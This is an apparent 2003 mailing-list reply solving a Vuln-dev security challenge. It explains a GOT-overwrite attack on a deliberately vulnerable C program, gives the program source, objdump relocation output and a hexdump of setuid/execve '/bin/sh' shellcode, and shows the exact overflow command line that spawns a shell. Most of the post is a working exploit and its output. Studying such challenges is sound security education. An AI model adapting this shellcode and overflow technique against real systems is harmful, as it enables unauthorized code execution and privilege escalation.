Strategy was to overwrite printf pointer with shellcode address.
1) Overwrite pointer held in bfp with strcpy(buf, argv[1]).
before:
[buf][bfp][ret]
after:
[buf][&printf - 2][ret]
Subtract 2 from printf addr to compensate for ";;%s;;" in fprintf
2) Overwrite printf function pointer with argv[2], fgets(bfp, BFSIZE, f1), f1 contains address of argv[1] or buf.
3) printf is then called which gives a shell.
Note that a BUFSIZE of 90 actually allocates 92 bytes on the stack.
/* vulndev2.c */
#include <stdio.h>
#include <stdlib.h>
#define BFSIZE 90
int
main(int argc, char *argv[])
{
char *bfp;
char buf[BFSIZE];
FILE *f1;
if (argc != 3)
return 1;
if ( (bfp = malloc(BFSIZE)) == NULL)
return 1;
/* debug */
printf("bfp = %p, buf = %p\n", bfp, buf);
/* log input */
if ( (f1 = fopen("db.log", "a+")) == NULL)
return 1;
fprintf(f1, ";;%s;;", argv[2]);
fclose(f1);
strcpy(buf, argv[1]);
/* read log */
if ( (f1 = fopen("db.log", "r")) == NULL)
return 1;
if (fgets(bfp, BFSIZE, f1) == NULL)
return 1;
printf("%s\n", bfp);
fclose(f1);
exit(1);
}
##
jroyes@tadpole:~/study/vuln-dev/cha2$ objdump -R vd2
vd2: file format elf32-i386
DYNAMIC RELOCATION RECORDS
OFFSET TYPE VALUE
08049874 R_386_GLOB_DAT __gmon_start__
08049848 R_386_JUMP_SLOT __register_frame_info
0804984c R_386_JUMP_SLOT fprintf
08049850 R_386_JUMP_SLOT malloc
08049854 R_386_JUMP_SLOT __deregister_frame_info
08049858 R_386_JUMP_SLOT fgets
0804985c R_386_JUMP_SLOT __libc_start_main
08049860 R_386_JUMP_SLOT printf
08049864 R_386_JUMP_SLOT fclose
08049868 R_386_JUMP_SLOT exit
0804986c R_386_JUMP_SLOT fopen
08049870 R_386_JUMP_SLOT strcpy
jroyes@tadpole:~/study/vuln-dev/cha2$ hexdump -C tiny.shell
00000000 31 db 31 c9 b0 46 cd 80 31 c0 50 68 2f 73 68 ff |1.1..F..1.Ph/sh.|
00000010 88 44 24 03 68 2f 62 69 6e 89 e3 50 53 89 e1 31 |.D$.h/bin..PS..1|
00000020 d2 b0 0b cd 80 |.....|
00000025
jroyes@tadpole:~/study/vuln-dev/cha2$ ./vd2 `perl -e 'print "A"x55'``cat tiny.shell``printf "\x5e\x98\x04\x08"` `printf "\x6c\xfa\xff\xbf"`
bfp = 0x8049898, buf = 0xbffffa6c
sh-2.05a$ exit
jroyes@tadpole:~/study/vuln-dev/cha2$
##
Thanks to sin for the tiny shellcode.
On Fri, 2003-05-23 at 18:13, Dave McKinney wrote:
>
> We are announcing the second challenge. Initially, we wanted to have this
> out a few days ago but were involved in testing it on multiple platforms.
> This challenge is a little easier than the first one, since we'd like to
> see more people attempting to produce a proof-of-concept. If you find it
> too easy, you're welcome to attempt it in an environment with a
> non-executable stack/heap to raise the bar a little.
>
> Here's a link to the basic guidelines (for those who missed it):
>
> http://www.securityfocus.com/archive/82/321615/2003-05-13/2003-05-19/0
>
> (also, please retain the [Vuln-dev Challenge] string in the subject line
> for replies to make for easier filtering for those not interested in
> challenge related discussion.)
>
> ---
>
> /* vulndev2.c */
>
> #include <stdio.h>
> #include <stdlib.h>
>
> #define BFSIZE 90
>
> int
> main(int argc, char *argv[])
> {
> char *bfp;
> char buf[BFSIZE];
> FILE *f1;
>
> if (argc != 3)
> return 1;
> if ( (bfp = malloc(BFSIZE)) == NULL)
> return 1;
>
> /* log input */
> if ( (f1 = fopen("db.log", "a+")) == NULL)
> return 1;
> fprintf(f1, ";;%s;;", argv[2]);
> fclose(f1);
>
> strcpy(buf, argv[1]);
>
> /* read log */
> if ( (f1 = fopen("db.log", "r")) == NULL)
> return 1;
> if (fgets(bfp, BFSIZE, f1) == NULL)
> return 1;
>
> printf("%s\n", bfp);
> fclose(f1);
> exit(1);
> }
>
> ---
>
> Dave McKinney
> Symantec
>
> keyID: BF919DD7
> key fingerprint = 494D 6B7D 4611 7A7A 5DBB 3B29 4D89 3A70 BF91 9DD7
--
Jason Royes
Data Access Experts
http://www.da-experts.com/
This archive was generated by hypermail 2b30 : Sat May 24 2003 - 14:01:34 PDT